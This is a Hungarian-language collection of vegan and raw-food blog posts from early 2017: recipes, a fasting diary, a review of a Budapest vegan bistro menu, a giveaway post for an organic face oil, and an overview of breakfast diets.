balzsamecettel... feltekerve, meglocsolva balzsamecettel és így néz ki felvágva Napközben másfél liter víz, 3 dl bio céklalé
Ezt ettem ma 2017. március 13. hétfő
2017. március 18. Gitta nyersétel blogja
Egy 21 napos böjti kihívás keretében a következő napokban megosztom, hogy mit eszem egész nap. Az első 7 nap teljes nyers, a második 7 nap turmix, illetve szűrt lé, utána pedig ismét 7 nap nyers étrend jön. Reggelire zöld turmix (1/2 grapefruit, 2 alma, 2 marék spenót, kevés víz, ezt összeturmixoltam, és a tálba tettem még banánt, gojibogyót, chia magot, kivit, aszalt szilvát. Jól összekevertem (miután lefotóztam) és állni hagytam egy félórát. Aztán jól megettem. Napközben nem tudtam ebédelni, mert dolgoztam, ezért ebédre ettem két banánt. Délután (ez volt az igazi ebéd) édesburgonyás diógolyót ettem retekcsírával, paprikával és céklás savanyúkáposzta salátával. Egy darabka édesburgonyát meghámoztam, apró darabokra vágtam, és egy marék (kb 5 dkg) dióval együtt bedobtam az aprítógépbe. Tettem hozzá egy csipetnyi ételízesítőt (Vali ez a Mici nénis cucc tényleg nagyon finom!!!! fantasztikus lett tőle ez a kis fasírt :) ) Szóval a buri és a dió az ételízesítővel összeaprítódott... nem túl apróra, épp hogy formázható legyen. Ebből kis golyókat formáztam egy tányérra, amire előzőleg kiborítottam egy marék retekcsírát. A tetejére ment egy kis kockára vágott kápia paprika. A savanyú káposztát kicsit összevágtam (nem mostam ki, jó annak a jó savanyú leve), és ráreszeltem egy kisebb céklát. Ami a képen látszik gyorsan elfogyott, még egy ekkora adagot ettem meg. kb 2 órával később fogtam két céklát és egy almát, lenyomtam a gyümölcscentrifugán, és megittam a levét. Egész nap elfogyott másfél liter víz
"Túrós " meggyes brownie
2017. március 14. Vegán receptek Tőlünk Nektek
Ági receptje:
Hozzávalók:
- 1 l szójatej
- 2 kanál ecet
- 3 cs vaniliás cukor
- 1 üveg magozott meggybefőtt
- 1 bögre kakaó/ karob
- 1 bögre nádcukor
- 2 bögre liszt
- 1/2 bögre olvasztott margarin
- 1 citrom héja
- 1 sütőpor
- 1 bögre (vagy kevesebb) növényi tej, vagy víz
A "túró" elkészítéséhez felteszem a szójatejet egy lábosban főni, mikor felforrt, beleteszem a két kanál ecetet, és pár perc múlva, mikor ketté válik a tej, lezárom. Egy konyharuhán keresztúl leszűröm, lecsepegtetem, és egy tálba helyezem a szójatúrót. ( Elég kevés lesz az 1 l tejből, ezért ha valaki úgy szereti a sütit, hogy gazdagon "túrós", akkor bátran készítheti 2 l tejből is. )
A tálba aztán beleöntöm a vaniliás cukrot, bele reszelem a citrom héját, és ha édesen szeretem, még cukrozom. Miután kikevertem a "túrót", félreteszem.
Egy tálba összeöntöm a brownie tésztához való alapanyagokat, és összekeverem. Liszt, karob, sütőpor, cukor, majd ha jól összekevertem, mehet az olvasztott margarin, és annyi folyadék, hogy viszonylag sűrű, de jól keverhető masszát kapjak.
A meggyet közben egy szűrőben lecsepegtetem.
Egy sütőpapírral kibélelt tepsibe öntöm a tésztát, és evőkanállal kis halmokba ráhelyezem a "túrót" úgy, hogy ne érjenek össze a halmok. A köztes térbe pedig a meggy szemeket helyezem.
180 fokra előmelegített sütöben kb 10 percig sütöm, majd 160 fokon még kb 35 percig. Ez persze sütőtől is függ.
Jó étvágyat!
Shakshuka pszeudo-tojással
2017. március 11. Vegán muflon
Most pedig átadnám a szót önkritikus énemnek: Mi ez az ótvaros mrutyok? A disznóm se enné meg, sőt, már attól vérhasban pusztulna el, ha kivinném a laptopot az ólba, hogy megmutassam neki! Ál-rántottát az izraeli lecsóra? Mi lesz a következő, fogkrémes padlizsán? Seduxenes zöldbabfőzelék? Sürgősen húzzál vissza vadászgörényt csutakolni, te málészájú szalmonella-generátor! Ám meg kell védenem magam magamtól! Egyrészt, mert a veganizálásnál kevés nemesebb cselekedet létezik, ez pedig bocsánatos bűnné teszi a gasztronómiai szentségtörést. Másrészt, mert taplóparaszt módon finom lett a végeredmény, és ez a lényeg. Aki nem ért egyet, hagyjon gyalázkodó kommenteket a bloggazda külön bejáratú szerzői oldalán! Komponensek: 1 fej vöröshagyma 1 ek barnacukor 2 db kaliforniai paprika (ha színvakoknak főzünk, lehetnek azonos színűek is) 800g aprított paradicsom (konzerves, de variáljunk!) 2 babérlevél 2 tk kakukkfű 1 tk római köménymag 1/2 tk sáfrány (hétfejű - kikacsintás, tapsoló nyugdíjasok) 2 ek petrezselyem felaprítva 2 ek korianderlevél felaprítva nüansznyi cayenne bors só/bors Az alternatív tojáshoz: 400g natúr tofu 1 tk római köménymag 1/2 fej vöröshagyma 1 tk kurkuma 3 ek növényi tejszín só/bors Ésakkor: A római köményt szárazon lepirítjuk, majd olajat adunk hozzá, és hozzápasszítjuk a felcsíkozott hagymát. Ha már üveges, mint öreganyám vitrinje, hozzáadjuk a felcsíkozott paprikát, a cukrot, a zöldfűszereket, és öt percig közepes lángon főzőkanállal tutujgatjuk. Hozzápasszítjuk a paradicsomot, a sáfrányt, a cayenne borsot, sózzuk, borsozzuk értetlenkedés nélkül. Addig főzzük, amíg a paprika roppanósan puha nem lesz. Egy másik edényben olajat hevítünk, hozzáadjuk a római köményt, a hagymát, a kurkumát, majd pár perc után az összetört tofut. Belelötyböljük a tejszínt, sózzuk, borsozzuk, majd a lecsó tetejére helyezve, ájtatos tekintettel szervírozzuk.
Nagyszerűen a Greatben....
Stőhr Grétával lassan 10 évre visszamenő az ismeretségünk... Amikor még alig voltak vega blogok a magyar neten, virtuálisan futottunk össze... aztán néhány évre rá együtt mentünk főzni a TV2-be. :) És azóta is időről időre összefutunk virtuálisan és most ismét nagy örömömre személyesen is. :) ... mert meghívást kaptam Grétáék szuper vegán bisztrójába a Great bisztróba egy degusztációs menü bemutatóra (hálás köszönet érte ezúton is, remek este, remek emberekkel! :). Hiszen a Bisztró, mely fennállása röpke ideje alatt eljutott oda a népszerűségi listán nagyszerű ételeinek köszönhetően, hogy délidőben gyakran az utcán állva kell bejutásra várni, most újabb lépcsőfokot lép felfelé. Elindul ugyanis az 'á la carte' esti vacsoralehetőséget kínáló éttermi opciója a bisztrónak. A külföldön már elterjedt gyakorlatot szeretnék Grétáék is megvalósítani, miszerint a reggel reggelizőként, délben önkiszolgáló bisztróként működő hely estére átalakul á la carte étteremmé. A most induló projekt részeként kb. 2 havonta fog változni az ételsor, mely 3 előételt, 3 levest, 3 főételt és 3 desszertet fog magában foglalni. A szűkebb választék azt a minőséget is hivatott szolgálni, mely így alkalmas lesz többek között a szezonalitásból eredő változások rugalmas követésére, a válogatott alapanyagok felhasználásával. A későbbi tervek között szerepel a vasárnap délelőttönkénti, akár családoknak is villás reggelit nyújtó kínálat és nyitvatartási idő hosszabbítás. A mostani á la carte lehetőség első alkalommal 2017. március 8-án (Nőnapon) vehető igénybe, 17-22h. Majd azt követően: március 11. (szombat): 12:00 - 22:00 március 15. (Ünnepnap): 12:00 - 22:00 AZ ÉTLAP (mely nem csak vegán, hanem egyben gluténmentes is): ELŐÉTELEK Club sandwich Karottás "lazac" remoulade mártással A bemutató vacsorán a degusztációs menü részeként megkóstolhattuk, és az íze olyannyira felidézte bennem a lazac általam nagyon-nagyon régen kóstolt ízét, hogy döbbenetes volt.... :) A sárgarépa 3 napig érlelődött egy sós és tengeri algás pácban, így nyerte el autentikus ízét. A hozzá kínált rizstejes majonéz ugyancsak szuper volt nem csak ízében, hanem állagában is! Ananászos kevert zöldsaláta sült - füstölt tofuval, vinaigrette öntettel Krémválogatás pirít?ssal, cruditevel - napraforgó pástétom - körözött - füstös padlizsánkrém LEVESEK Egzotikus kardamomos gyümölcsleves Thai citromfüves zöldségleves kókusztejjel Citrusos - joghurtos zellerkrémleves Elmondhatom, ilyen isteni zellerkrémlevest még életemben nem ettem! A citrom eszméletlenül a helyén volt benne, se túl sok, se túl kevés, hanem fantasztikusan megfelelő! :) FŐÉTELEK Sült teriyaki tempeh szarvasgombás fénygyökérpürével és marinált szezámos pak choi-jal Narancsos sütôtökös risotto Aszalt paradicsomos édesburgonyás gnocchi parmezánropogóssal A csak édesburgonyából és nem sima burgonyából készült alaptészta zabliszt hozzáadásával készült, egy fantasztikus paradicsomos szósszal. A parmezánropogós pedig kizárólag növényi sajtból. DESSZERTEK Pisztáciába, kókuszpehelybe, aszalt áfonyába forgatott álomgombóc válogatás narancsvirágvizes szója-joghurtöntettel Céklás - csokoládés brownie Mangós tiramisú Szerencsére a desszertek esetében Gréta úgy döntött, mind a hármat megkóstoltatja velünk... :P :D És hát nálam csodás krémességével, selymességével a Tiramisú krémje vitte a prímet. Szerintem meg nem mondta volna róla senki, hogy tojás és mascarpone nélkül készült! ;) Szóval, ha ünnepien jót szeretnétek enni, vegánul, vagy esetleg ételérzékenységek, allergiák miatt, ne hagyjátok ki ezt a remek lehetőséget! Ráadásul ezeken az Ünnep- és szabadnapokon akkor nem is kell otthon nekiállnotok főzni! ;) A Great Bisztró Facebook oldala: https://www.facebook.com/greatbistrobudapest/ Asztalfoglalás: 06702149072
Várd sárgán a tavaszt!
2017. március 4. Beautilicious
A mai nap sztárja a sárgarépa! Szeretnék nektek mutatni 3 tíz perc alatt összedobható receptet sárgarépával, és budítani titeket arra, hogy fogyasszátok rendszeresen ezt a zöldséget. Az egyik kedvenc alapanyagom, mert magában is eszméletlen finom, és számtalan módon elkészítheted. Levesbetét, leves alapanyag, répapüré, turmix, répatorta, saláta...és a sornak még nincs vége. Na de vajon miért jó, ha rendszeresen fogyasztunk sárgarépát? Tartalmaz kalciumot, káliumot, nátriumot, foszfort, vasat, magnéziumot, krómot, sót, A, B komplex, C, E, G és K vitaminokat. Nagyon alacsony a kalóriatartalma, alig van benne zsír és 0 a koleszterin tartalma. Fogyasztása különösen ajánlott a fogynivágyóknak és a magas koleszterinszinttel rendelkező emberek számára. A répa rengeteg hasznos tápanyagot tartalmaz, mely közre játszik számos betegség megelőzésében és az immunrendszer erősítésében. Javítja a látást, erősíti a fogakat és a csontokat. Továbbá, ez a csodás zöldség nem csak belül, de kívül is megszépít. Rendszeres fogyasztása hajunkkal és bőrünkkel is csodát művel magas antioxidáns tartalmának köszönhetően. Kell ennél több? Iktassátok be étrendetekbe már ma a sárgarépát. Ahogy ígértem, itt a három villám recept ; - Édes reszeltrépa - 3répa - 1marék mazsola - édesített fahéj Nincs más dolgod, mint a megtisztított sárgarépát lereszelni, majd megszórni mazsolával és fahéjal. 2. Répás zabkása - 60g zab - 150ml tej/víz - 1ek édesítő - 100g répa - 1 tk fahéj Főzd meg a zabot vízben, majd add hozzá a répát és további 5 percig főzd. Ha kész ízesítsd fahéjal. 3. Répakrém - 2db sárgarépa - 3ek tejföl - őrölt kömény - só, bors Főzd puhára a megtisztított répákat, majd tedd turmixgépbe vagy aprítóba és pépesítsd. Keverd hozzá a tejfölt és ízlés szerint fűszerezd.
Diéta vagy életmód?
2017. március 3. Beautilicious
Sokan kérdezik;Miért diétázol? Meddig akarod ezt csinálni? Hány kiló a célod? Miért nem eszel gyors kaját, finomított élelmiszereket? Számomra a válasz egyértelmű. Ez nem diéta ez életmód! Mióta egészségesen és tudatosan étkezem, sokkal kiegyensúlyozottabb vagyok mind testileg, mind lelkileg. A kezdetekben persze ezt else tudtam volna képzelni, hisz tonna számra faltam a csokit és a péksüteményeket. Mára semmi nem változott. A reggelemet imádom édesen indítani például egy tiramisuval, fánkkal vagy mondjuk egy adag kókuszgolyóval, csak kicsit átalakítva. Ezeknek az alapanyaga nem más, mint gyümölcsök, zöldségek, zab, maglisztek, tojás, vagy épp magliszt, ennek ellenére íze olykor jobban sikerül, mint egy hagyományos cukros, tartósítószerrel teli desszerté. Az elején rossz úton indultam, és abban a tévhitben éltem, hogy a nem evés fogyaszt. NEM! Ez marha nagy baromság, szeresd a tested és inkább kényesztesd el őt egy egészséges édességgel, ami nemcsak hogy testednek, de lelkednek is erőt ad. Nekem az úton pédaképem, az anyukám segített elindulni, aki nélkül sehol se lennék. A közös sütések és a közös edzések mindig feldobják a napomat. Ha úgy érzed, rossz napod volt, nem kell mást tenned csak elmenni az edzőterembe azzal a személlyel akit igazán szeretsz, és egy közös mozgás el is feledteti veled, hogy miér voltálszomorú. Ezt tapasztalatból mondom :). Nem beszélve arról, hogy a mozgás nemcsak hogy hozzátartozik az egészséges életmódhoz, de egy remek program, főleg ha azzal csinálod, akit a világon a legjobban szeretsz. Célom, hogy én is segíthessek nektek. Nincs is jobb érzés, mikor egy sikeres sütit alkotok, amit aztán megoszthatok veletek. Bár még csak 17 éves vagyok, sok mindenen keresztül mentem, de úgy érzem, mára megtaláltam önmagam, és azt ami igazán boldoggá tesz Ha kérdésetek van szívesen válaszolok, legyen az egy sütivel, vagy épp az életmóddal kapcsolatos, de tulajdonképpen bármilyen témában forduljatok hozzám, szívesen válaszolok. :)
Vegán életmód – Perla Organic Skincare + Nyereményjáték
2017. március 2. Zizi kalandjai
A nyereményjáték lezárult! A nyertes: Bárdi Júlia emailben lett értesítve. Köszönöm, hogy játszottatok!
Távol állok a beauty blogolástól, nem vagyok a téma szakértője, de többen kérdeztétek már, hogy milyen natúrkozmetikai termékeket használok, ezért indítok egy sorozatot itt a blogon (vegán szépségápolás), amelyben vegán kozmetikai, szépségápolási termékeket mutatok be, amelyeket kipróbáltam, használok és nagyon jónak tartok.
Arra, hogy mit kenek az arcomra (nyaktól felfelé) már lassan tíz éve odafigyelek, de nyilván az idősödés újabb vékonyka ráncokkal jár és rájöttem, hogy ha csak egy kicsivel több időt fordítok magamra, már sokat tettem magamért, azért, hogy lestrappált anyaként kicsit jobban érezzem magam és igen, lassítsam az öregedés folyamatát is, csak egy icike-picikét. Általában fiatalabbnak néznek a koromnál, ez jól esik az egómnak – lehet, hogy hála annak a krémnek, amit már jó néhány éve használok? Nem tudom… talán igen, de azt nagyon fontosnak tartom, hogy időben elkezdjük a korunknak megfelelő bőrápolást.
Amióta anya vagyok azóta tényleg nagyon kevés időt szánok magamra. Amíg régen kétszer mostam hajat egy héten, most csak egyszer (mondjuk egyik várandósságom alatt sem zsírosodott a hajam, ekkor szoktam rá a heti egyszeri hajmosásra). Hajpakolás évente egyszer kerül a hajamra, arcpakolást nagyon ritkán lát az arcom, noha mindegyikből többet szeretnék. Meg néha jól jönne egy kis wellnesezés, amikor befekszem a kádba, bedobok egy fürdőgolyót, lazítok és kikapcsolok végre a hektikus hétköznapokból.
A Perla organikus arcápoló olajat nemrég ismertem meg. Kizárólag hidegen sajtolt, finomítatlan, bio minősítésű olajokat és megtisztelő Demeter minősítésű illóolajokat tartalmaz – jojoba, ligetszépe, szőlőmag, ricinus, tamanu, római kamilla, pálmarózsa, vanília, édesnarancs, vetiver, teafa, linaloefa. Olyannyira a napom részévé vált, hogy napközben többször eszembe jut az újonnan beiktatott kis rutinom és elkezdem várni az estét, hogy csak öt percre is, de egy wellness kényeztetésen érezzem magam. A Perlaval lehet sminket is eltávolítani, én viszont ápolásra használom, mert a munka, a háztartás és a gyerekek mellett alig jut időm magamra, de felismertem, hogy vágyom a puha, hidratált bőrre. A Perlaval beolajozom az arcom, jól átmasszírozom, majd egy meleg vízzel átitatott kis törölközőt az arcomra teszek és várom, hogy egy-két perc alatt a törölköző kihűljön, jól átdörzsölöm vele az arcomat és már készen is vagyok. A nap végén ezt a “luxust” megengedni magamnak, a legjobb dolog. Másnap tényleg tisztább a bőröm, kipihentebbnek tűnök és olyan jól érzem magam tőle.
A Perla csodaszép dobozban érkezik…
A Perla megálmodójával és létrehozójával, Geosics Reginával beszélgettem az alkotásról, a termékről…
Hogyan jött az ötlet és mikor, hogy létrehozz egy ilyen terméket? Mi volt a cél, milyen terméket szerettél volna és miért?
Mindig is problémás bőrrel rendelkeztem, ami körülbelül fél évvel ezelőtt tetófokára hágott… nem csak esztétikailag volt zavaró, de már fájt is a gyulladástól. Szeretem holisztikusan megközelíteni a dolgokat, de akkor úgy éreztem, hogy a táplálkozásommal, életmódommal kapcsolatosan minden tőlem telhetőt elkövetek és “kívül” kell a megoldást keresnem… Emellett kisfiam születése óta folyamatosan keresem azokat a megoldásokat amik leegyszerűsítik az életemet. Ekkor jött szembe egy módszer, az OCM (oil cleaning method) ami itthon még nem túl elterjedt, de külföldön már egyre népszerűbb. Azonnal éreztem, hogy ezt nekem is ki kell próbálnom, de itthon nem találtam hozzá megfelelő minőségű és összetételű olajkeveréket, külföldről pedig túlságosan költséges lett volna rendelni. Így óriási kutatásba kezdtem, annyira belelkesedtem, hogy éjjel-nappal csak ezzel foglalkoztam – nyilván amennyire lehet egy totyogó mellett. Megalkottam a számomra tökéletes kompozíciót és nagyon rövid időn belül látványos eredményt értem el. Környezetemben is felfigyeltek rá és kérték, hogy nekik is keverjek ki Perlát (aminek akkor még nem volt neve). Ekkor bevillant, hogy ha ennyire hatásos és ennyire nem ismerik még Magyarországon, miért ne lehetne mások számára is elérhető. Szeretném terjeszteni magát a módszert és a Perlát is, hogy minél több nőhöz eljusson. Annyira fontos, hogy mi az amit magunkra kenünk és – habár egyre több tudatos nővel találkozom – az emberek nagy részének fogalma sincs arról, mit ken magára.
Milyen szakemberekkel (vagy kikkel) dolgoztál együtt a termék létrehozása során?
A receptet végül egy fantasztikus aromaterapeuta segítségével tökéletesítettük, akitől sokat tanultam és még inkább felnyitotta a szemem, hogy illóolajból csakis a legeslegjobbat érdemes használni. Óriási erő egy kis cseppben, nem is gondolnánk milyen hatással van ránk – nem csupán érzékeinkre, de hangulatunkra, lelkünkre, testünkre. Azóta az illóolajok szerelmese vagyok. A folyamatban részt vett még egy vegyész és a manufaktúra tulajdonosa, ahol minden egyes Perla készül.
Milyen magyar vagy nemzetközi minősítésekkel rendelkezik a termék (Vegan, Cruelty Free, Cosmos Naturel, Biokontroll Hungária Kft, stb.)?
A Perla vegán termék és természetesen állatkísérletektől mentes valamint az összes összetevő bio gazdálkodásból származik, sőt az illóolajok a megtisztelő Demeter minőséggel rendelkeznek. A kész terméket még nem szertifikáltattuk, de tervben van. Hosszú és költséges a folyamat, amit kezdő családi vállakozásként egyelőre még nem tudunk vállalni. Tudom, hogy a hivatalos minősítés fontos, de ami még fontosabb, hogy minden este olyan tiszta lelkiismerettel fekszem le, mint amilyen tiszta a Perla is!
Tervezel el termékbővítést? Ha igen, mi lesz a következő terméked?
Először azt gondoltam, hogy egy tökéletes termék legyen, ami használható tisztításra, sminkeltávolításra, arc- és testápolásra… azóta persze beindult a fantáziám. Nem tervezek széles termékpalettát, de egy-két egyedi ötletem, álmom van, amit még szeretnék megvalósítani. Azt még nem tudom, melyik lesz a következő!
Regina blogja, a Feminie
A Perla elérhető az alábbi linkeken:
– weboldal
– Facebook
– Instagram
A termékeket a {Perla Skincare} biztosította a teszteléshez. A véleményem csakis a sajátom.
*****
NYEREMÉNYJÁTÉK!!!
Nyeremény : Egy üveg (50 ml) Perla többfunkciós organikus olaj. Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen natúrkozmetikai, szépségápolási terméket (márkát) használtok, amely nagyon bevált számotokra.
Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki (bejelentkezés email címmel a formulába): kommentelés (ide a bejegyzés alá) és plusz pontokért lájkoljátok a Perla Facebook, illetve Instagram oldalát. 2017. március 6-ig lehet játszani. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2017. március 7-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Perla Skincare postázza magyarországi címre.
a Rafflecopter giveaway
Pudingos gyümölcsös finomság
Sok háziasszony készít gyakran keksztekercset, vagy kókusztekercset, aminek az alapja darált keksz és a belsejébe cukros margarinos krém kerül. A következő receptem sütés nélkül elkészíthető édesség, aminek hasonlóan a keksztekercs tésztája az alapja. A krémje viszont egyszerű pudingkrém. Mivel a tészta barna színű, ezért érdemes fehér vagy sárga pudingot készíteni. Vanília, tejszín vagy banán ízű pudingporokat ajánlom hozzá.
A recept
Hozzávalók a tésztához:
15 dkg (vegán) darált keksz
10 dkg darált zabpehely
kb. 1-1,5 dl koffeinmentes kávé
pár csepp rumaroma (elhagyható)
3 evőkanál kakaó (cukor nélküli)
10 dkg édesítőszer (xylit, gyümölcscukor, agavé szirup, stb.)
Krémhez:
4 dl növényi tej
1 csomag (vegán) pudingpor
néhány kanál édesítőszer (attól függően, ki milyen édesen szereti)
Díszítésnek narancs, aszalt meggy/szilva, menta- vagy citromfűlevél
Elkészítés:
Először pudingot főzünk a növényi tejből és a pudingporból a puding csomagolásán található útmutató szerint. (Általában a pudingport először egy kevés hideg növényi tejjel kikerverjük, majd a maradék tejet felforraljuk, ebbe tesszük bele a kikevert pudingport és az édesítőt. Addig forraljuk, és folyamatosan keverjük, míg be nem sűrűsödik.) A pudingot lehűtjük.
A tészta alapanyagait alaposan összegyúrjuk, két részre osztjuk. Kerek tálba vagy tortaformába folpackot teszünk, a tészta felét belesímítjuk, rásimítunk egy adag pudingot, majd a másik tésztából hasonló formát készítünk és a puding tetejére fektetjük. Hütőbe tesszük és várunk 1-2 órát, hogy megdermedjen, összeálljon. Majd a fólia segítségével kiemeljük, egy tálcára tesszük és a maradék pudingot a tetején elsimítjuk. Gyümölcsökkel/ menta vagy citromfűlevéllel díszítjük a tetejét, ismét hűtőbe tesszük. Tálalásig ott tároljuk.
Édesburgonyás tofurántotta currys hummusszal
2017. február 26. Vegán muflon
Hadd kezdjem egy nagy hírrel! Egy Michelin-csillagos francia étterem séfje szólt, hogy segédkezhetnék neki a konyhán. De én rácsaptam a kagylót! Az iménti bevezető is hűen tükrözi, egy férfi esetében a nátha a szellemi kapacitásra is hajlamos súlyosan pusztító hatást gyakorolni. Ám ez még mindig eltörpül amellett az extrém idegállapot mellett, ami normális esetben csak a félig női szupermodell - félig griffmadár jellegű mitológiai vadakat jellemzi. Szóval ezúttal csak csökkentett üzemmódban voltam képes alkotni, de azért harmadik világbeli fogolytáborokban talán ezt a művet is szégyenérzet nélkül szervíroznák.
Alkotóelemek:
400g natúr tofu 1 drabálisabb édesburgonya 1 közepes fej lilahagyma 1 tk kurkuma 1 csokor petrezselyem felaprítva 2 tk tandori masala fűszerkeverék (Tisztelt Muflon úr! Mi ez és hol lehet beszerezni? Árulja el, vagy szájba térdelem! - írja Hegemón-Konkáv Rezsőné Buhargerlócról. Nos, Kedves, kínai és Ázsia-boltokban tessen próbálkozni!) 1 tk curry 1/2 tk barnacukor 1/2 fej kínai kel vagy salátakeverék só, bors Az édesburgonyát vonakodva meghámozzuk, felkockázzuk, a lilahagymát cikkekre vágjuk. Aztán. Ezt az egész rahedli zöldséget egy ún. tálba helyezzük, hogy maximálisra emeljük az elmosandó edények számát. Hozzáadunk 2 ek olívaolajat, a cukrot, a tandori masalát, sózzuk, borsozzuk, majd összekeverjük. Ezt az elegyet 180 fokra melegített sütőben 25 percig süssük. Pont. Közben a tofut egy villával összetörjük, kevés olívaolajon megpirítjuk, hozzáadjuk a kurkumát és a sót, és félretesszük. A salátát kevés olívaolajjal és tandori massalával összekeverjük. Ha az egész hóbelevanc kész van, hummuszt készítünk (de a boltban vásárolt sem tartozik a gasztroterrorizmus hatáskörébe), és curryval elvegyítve tálaljuk vele a kész cuccot.
Rakott édesburgonya (vegán)
Bár édesburgonyának hívjuk, nem csak Magyarországon, Angliában is, valójában a batátának semmi köze nincs a burgonyához, legfeljebb a hasonló alak és a földben termő gumó/gyökér. Mégis, ha lehetne, lecserélném a krumpli és az édesburgonya pozícióját a magyar háztartásokban. Milyen lenne, ha egy jó kis krumplistészta számítana kuriózumnak, nem pedig a batátából készült ételek? :) Kérdésem költői kérdés, mielőtt bárki kommentben erre választ hagyna. Szóval ha még nem próbáltad az édesburgonyát, íme egy szokványos recept, rakott batáta. Szabadon variálhatod, mivel rakod össze, most tofuval és gabonakolbásszal készítettem el.
A recept
Hozzávalók:
- 8 közepes batáta/édesburgonya
- egy szál gabonakolbász
- 1 csomag tofu
- szójajoghurt
- só
- kókuszzsír
- víz
Elkészítés:
A megmosott batátákat héjastól vízben megfőzzük, de ne túl puhára. Közben felszeleteljük a tofut, majd a kolbászt kókuszzsírral kikenünk egy tűzálló tálat. A joghurtba keverhetünk pl. provance fűszerkeveréket, vagy csak egy kis ételízesítőt, de ez el is maradhat. A megfőtt batátákat hideg vizzel átzuhanyoztatjuk, majd ha picit lehűltek, megpucoljuk őket, majd felkarikázzuk. A tűzálló tálba először egy sor felkarikázott batátát teszünk, megsózzuk, majd tofut, szintén megsózzuk (vagy használhatunk valamilyen fűszerkeveréket is só helyett). Kolbászkarikákat teszünk le következőnek. Mindezt addig ismételjük, míg minden el nem fogy. A legjobb, ha édesburgonya, azaz batáta kerül a tetejére. Legvégül joghurttal megkenjük. Ezután mehet a sütőbe, ahol pirulásig sütjük.
Narancsos szelet
2017. február 21. Vegán receptek Tőlünk Nektek
Eszter sütije:
Karobos tészta:
- 12 ek liszt (tönköly fehér)
- 8 ek nádcukor
- 2ek karobpor
- fél dl olaj
- 1kk citromlével lecsepegtetett szódabikarbóna
Piskóta sűrűségű tésztává higítjuk vízzel, utána kiolajozott tepsibe öntjük. Tűpróbáig sütjük. Utána hagyjuk hűlni.
Köleskrém:
Fél bögre kölest felteszek főni négyszeres vízzel pici sóval. Ha megpuhult teszek bele marék (ízlés szerinti nádcukrot), 2 ek yofut (elhagyható), vaníliaport, 1 ek citromlét, kicsi vajat hogy krémesebb legyen (elhagyható). Aki nem szereti a kölesszemeket, az botmixerrel pépesítheti. Utána a kissé hűlt piskótára halmozom.
Narancspuding:
Felteszek 6dl narancslevet (100%os bármilyen bolti dobozos) főni. Majd egy kis tálban 1dl narancslével elkeverek 4ek kukoricakeményítőt és kevés vaníliaport. Ha forr a lé, akkor belekeverem a keveréket a narancslébe és pudingot főzök. Ha besűrűsödött teszek bele ízlés szerinti cukrot (attól függ milyen a narancslé). Jó ha a puding inkább picit savanyú mert a tészta és a krém úgyis édes. A végén a krémre helyezem a pudingot. Miután teljesen kihült, szeletelhető.
Jó Étvágyat!
Mit egyek reggelire?
2017. február 20. Eszemiszom – Jóga Magazin
Mint ahogy minden diétás kérdésre, erre is számtalan választ kaphatunk, ráadásul egymásnak ellentmondókat is. Az emberek ugyanis eleve szerteágazóan állnak hozzá az étkezés témájához. Egy biztos: nincs olyan válasz, ami mindenkinek megfelelne. Ugyanis mindenkinek más az anyagcseréje, az életmódja, az energiafelhasználása, a hormonszintje, a genetikája stb. Szóval egyet leszögezhetünk: nincs olyan válasz, ami mindenkinek működne. De azért lássunk pár opciót!
1. 160 g CH
Ez ma a legmenőbb diéta, napi öt étkezést javasol, melyekre nagyjából egyenletesen oszlik el a 160 g szénhidrát. Persze ez csak átlagnak tekinthető, hiszen egy 18 éves és egy 60 éves, vagy egy 50 és 150 kilós ember CH-szükséglete között azért fog mutatkozni némi különbség. És akkor még nem beszéltünk arról sem, hogy mennyi energiát használ fel az adott napon. (pl. egy irodai munkás, egy testépítő vagy egy marathoni futó energiaigénye nem ugyanaz). Szóval 30 g szénhidrát a reggeliben jó ötlet lehet, de akkor még figyelembe kell venni, hogy milyen a glikémiás indexe, van-e benne glutén, egyszerű vagy összetett szénhidrát, finomított vagy nem, és mennyi rostot, zsírt, és fehérjét vittünk be mellé.
2. Paleo
Vegyük ide a ketogén diétát is az egyszerűség kedvéért. Mindkettőre az jellemző, hogy notóriusan kevés szénhidrátot fogyasztanak, és reggelire is zsírokat meg fehérjét fognak javasolni, például sonkás tojásrántotta, vagy egyéb húsfélék, alacsony keményítőtartalmú zöldségekkel együtt fogyasztva. Persze ebben a diétában a többi étkezés is hasonló módon épül fel: hús és zöldség. A híve azt tartják, hogy így étkeztek a neander-völgyi ősemberek. persze szerintem ők akkor ettek, amikor volt mit, és azt ették meg, amit találtak. Ha az éppen valamilyen termés vagy gyökér volt, akkor abban még szénhidrát is volt.
3. 811.
Ez a zsír- és fehérjeszegény étrendet folytató nyersvegánok diétája, szóval ők valószínűleg gyümölcsöket fognak enni reggelire is. Viszont nem esznek mellé gabonákat meg olajos magvakat sem nagyon.
4. Harcosok étrendje
Ők azok, akik agy jó hosszú böjttel kezdik a napot, legfeljebb alacsony glikémiás indexű zöldségleveket esznek, ha nem bírják ki alacsony vércukorral az egész napot. Persze este aztán mindent bezabálnak, amitől ki is leng az inzulinszint rendesen. Ez szerintem nem túl jó, tehát én inkább a napi több étkezés híve vagyok, még ha este valóban nincs ellenemre egy alaposabb étkezés.
Ha reggel nem edzünk, hanem a munkahelyre indulunk, ahol nem várható fizikai terhelés, akkor is kell reggelizni, de lehet kevesebb az energiatartalma, és minden esetben jó, ha törekszünk az alacsonyabb glikémiás indexű ételek fogyasztására. Reggel ugyanis az éjszakai éhezés után könnyebben megugrik az inzulinszint, ami több szempontból nem előnyös. Sem az izomszintézist, sem a zsírégetést nem segíti elő. Ha viszont edzeni vagy kardiózni indulunk reggel, akkor azt nem ajánlott éh gyomorra tenni, mert a glikogénraktárak alacsonyak lesznek, és nem fogunk tudni jó teljesítményt leadni, valamint a zsír mellett izomfehérjét is könnyebben veszíthetünk, ha éh gyomorra edzünk.
Én például reggel rögtön felkelés után készítek egy turmixot: banán, bogyós mirelit gyümölcs, datolya, növényi tej, Naturize barnarizs-protein, BCAA, kakaó, matcha zöld tea, maca, és útifű-maghéj szokott menni bele. Ezzel együtt beszedem a vitaminjaimat és utána indulok a terembe. Megtartom az edzést, majd leedzek, és kb 11-12 óra van, mire végzek. Szóval ekkor jön a következő étkezés, bár nem ártana közte is enni valamit.
